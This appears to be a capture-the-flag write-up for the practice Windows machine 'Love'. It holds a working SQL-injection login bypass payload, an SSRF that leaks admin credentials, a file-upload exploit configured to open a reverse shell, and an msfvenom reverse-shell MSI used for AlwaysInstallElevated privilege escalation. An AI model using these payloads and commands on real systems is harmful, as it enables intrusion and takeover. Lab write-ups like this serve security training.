Recon
rustscan x nmap
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
|
└─$ rustscan -b 10000 -a 10.10.10.239 -- -T5 -A -sV -Pn
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: Voting System using PHP
135/tcp open msrpc syn-ack Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn
443/tcp open ssl/http syn-ack Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: 403 Forbidden
445/tcp open microsoft-ds syn-ack Windows 10 Pro 19042 microsoft-ds (workgroup: WORKGROUP)
3306/tcp open mysql? syn-ack
|_ Host '10.10.16.11' is not allowed to connect to this MariaDB server
| mysql-info:
|_ MySQL Error: Host '10.10.16.11' is not allowed to connect to this MariaDB server
5000/tcp open http syn-ack Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: 403 Forbidden
5040/tcp open unknown syn-ack
5985/tcp open http syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
5986/tcp open ssl/http syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
7680/tcp open pando-pub? syn-ack
47001/tcp open http syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc syn-ack Microsoft Windows RPC
49665/tcp open msrpc syn-ack Microsoft Windows RPC
49666/tcp open msrpc syn-ack Microsoft Windows RPC
49667/tcp open msrpc syn-ack Microsoft Windows RPC
49668/tcp open msrpc syn-ack Microsoft Windows RPC
49669/tcp open msrpc syn-ack Microsoft Windows RPC
49670/tcp open msrpc syn-ack Microsoft Windows RPC
Host script results:
| smb-os-discovery:
| OS: Windows 10 Pro 19042 (Windows 10 Pro 6.3)
| OS CPE: cpe:/o:microsoft:windows_10::-
| Computer name: Love
| NetBIOS computer name: LOVE\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2022-09-05T13:06:02-07:00
|
The nmap scan provide us some informations about the machine. It is a Windows 10 Pro station.
We discover a MySQL server running on port 5000 but we don’t have an access to it. It is IP filtered.
1
2
|
└─$ mysql --host=10.10.10.239
ERROR 1130 (HY000): Host '10.10.16.11' is not allowed to connect to this MariaDB server
|
We got a http server on port 80 and several other ports. We can see on the http-title
get from the scan that the website use a Voting System.
Browsing to http://10.10.10.239/index.php, we are face to a login form.
Index page with the login form
dirbuster
Using dirbuster
we discover some directory and an interesting admin login page at http://10.10.10.239/admin/index.php.
Vulnerabilities
searchsploit
Running searchsploit
we found multiple vulnerabilities on the Voting System.
1
2
3
4
5
6
7
8
9
|
└─$ searchsploit voting system
----------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------------------------------- ---------------------------------
Voting System 1.0 - Authentication Bypass (SQLI) | php/webapps/49843.txt
Voting System 1.0 - File Upload RCE (Authenticated Remote Code Execution) | php/webapps/49445.py
Voting System 1.0 - Remote Code Execution (Unauthenticated) | php/webapps/49846.txt
Voting System 1.0 - Time based SQLI (Unauthenticated SQL injection) | php/webapps/49817.txt
----------------------------------------------------------------------------------- ---------------------------------
|
First, we will focus on the Authentication Bypass (SQLI). To try to bypass the login form on the admin page.
Exploiting Voting System
First solution - SSRF
On the nmap scan we discover a certificate on port 443.
We can extract from it two domains:
- love.htb
- staging.love.htb
Subject name of the certificate containing 2 domains
1
2
|
# put both domain on /etc/hosts
echo "10.10.10.239 love.htb staging.love.htb" > /etc/hosts
|
Browsing on http://staging.love.htb we are face to a file scanner service. We found a demo page where we can provide url that point to file.
URL File scanner
Do you remember the MySQL filtered service ? Maybe we can get some information from that service.
Exploiting SSRF on the scanner service
We get our creds admin:@LoveIsInTheAir!!!!
!
Second solution - SQL injection
This exploit use an Union Base SQLi to bypass authentication.
We need to provide a bcrypt hash and a non-existing user
1
|
login=&password=admin&username=coucou' UNION SELECT 1,2,"$2y$10$913MFiqWEjfzJ0fZc74hQeRdPGOdggX7KFbd23rfPyf5zmnISBC3a",4,5,6,7 from INFORMATION_SCHEMA.SCHEMATA;-- -
|
With burp, I craft this payload and I try the SQLi:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
|
POST /admin/login.php HTTP/1.1
Host: 10.10.10.239
Content-Length: 194
Cache-Control: max-age=
Upgrade-Insecure-Requests: 1
Origin: http://10.10.10.239
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://10.10.10.239/admin/index.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=sv9dcm0k1bv1gl1q2nhq5db1e0
Connection: close
username=coucou%27+UNION+SELECT+1%2C2%2C%22%242y%2412%24jRwyQyXnktvFrlryHNEhXOeKQYX7%2F5VK2ZdfB9f%2FGcJLuPahJWZ9K%22%2C4%2C5%2C6%2C7+from+INFORMATION_SCHEMA.SCHEMATA%3B--+-&password=admin&login=
|
It works! We are now connected to the Dashboard as Neovic Devierte (admin)
.
Voting System Dahsboard
Get our first shell
Now that we are connected we can use the File Upload RCE (Authenticated Remote Code Execution) exploit found with searchsploit
.
The exploit is a python script. This one will upload a php script throught the profile photo upload feature. Our script will spawn a reverse shell.
We edit the script to fit our needs.
1
2
3
4
5
6
7
8
9
10
11
12
|
# --- Edit your settings here ----
IP = "10.10.10.239" # Website's URL
USERNAME = "admin" # Auth User
PASSWORD = "@LoveIsInTheAir!!!!" # Auth Password
REV_IP = "10.10.16.11" # Reverse shell IP
REV_PORT = "4444" # Reverse port
# --------------------------------
INDEX_PAGE = f"http://{IP}/admin/index.php"
LOGIN_URL = f"http://{IP}/admin/login.php"
VOTE_URL = f"http://{IP}/admin/voters_add.php"
CALL_SHELL = f"http://{IP}/images/shell.php"
|
After opening a listener with nc
I execute the exploit.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
|
└─$ rlwrap nc -lnvp 4444
listening on [any] 4444 ...
connect to [10.10.16.11] from (UNKNOWN) [10.10.10.239] 54012
b374k shell : connected
Microsoft Windows [Version 10.0.19042.867]
(c) 2020 Microsoft Corporation. All rights reserved.
C:\xampp\htdocs\omrs\images>whoami
whoami
love\phoebe
C:\xampp\htdocs\omrs\images>type C:\Users\Phoebe\Desktop\user.txt
*************************7feb616
|
We get a shell! We are now connected as love\phoebe
, we can get the user flag.
Path to the privesc
Local recon
Search for any used ports, tasks or privileges.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
|
# show used ports
C:\xampp\htdocs\omrs\images> netstat -ano | findstr TCP
# search for tasks
C:\xampp\htdocs\omrs\images> tasklist /v
# show privileges
C:\xampp\htdocs\omrs\images>whoami /all
Privilege Name Description State
============================= ==================================== ========
SeShutdownPrivilege Shut down the system Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled
|
But I don’t find any interesting informations.
WinPeas
I launch a WinPeas scan and I found that the AlwaysInstallElevated
privilege is enabled. It means that we are able to install & execute MSI package.
1
2
3
4
|
---------- Checking AlwaysInstallElevated
- https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#alwaysinstallelevated
AlwaysInstallElevated set to 1 in HKLM!
AlwaysInstallElevated set to 1 in HKCU!
|
Abusing privileges
It is possible to craft our MSI Package from msfvenom
. Then, we upload the package on the target. Finally, we install & execute the package with the msiexec
command.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
|
└─$ msfvenom -p windows/x64/shell_reverse_tcp lhost=10.10.16.11 lport=4445 -f msi > exploit.msi
# upload the MSI package on C:\Windows\Temp dir
C:\xampp\htdocs\omrs\images>msiexec /quiet /qn /i C:\Windows\Temp\exploit.msi
└─$ nc -lnvp 4445
listening on [any] 4445 ...
connect to [10.10.16.11] from (UNKNOWN) [10.10.10.239] 54112
Microsoft Windows [Version 10.0.19042.867]
(c) 2020 Microsoft Corporation. All rights reserved.
C:\WINDOWS\system32>
C:\Users\Administrator\Desktop>type root.txt
type root.txt
**************************43d68b
|
We are now system owner ! We can get the flag :)
Easy, Internal, Apache, Penetration Tester Level 1, SSRF Exploitation, A05:2021-Security Misconfiguration, Public Vulnerabilities, MySQL, Unrestricted File Upload, Windows Vulnerabilities, Remote Code Execution, Confidentiality, Code Execution, Defense Mechanisms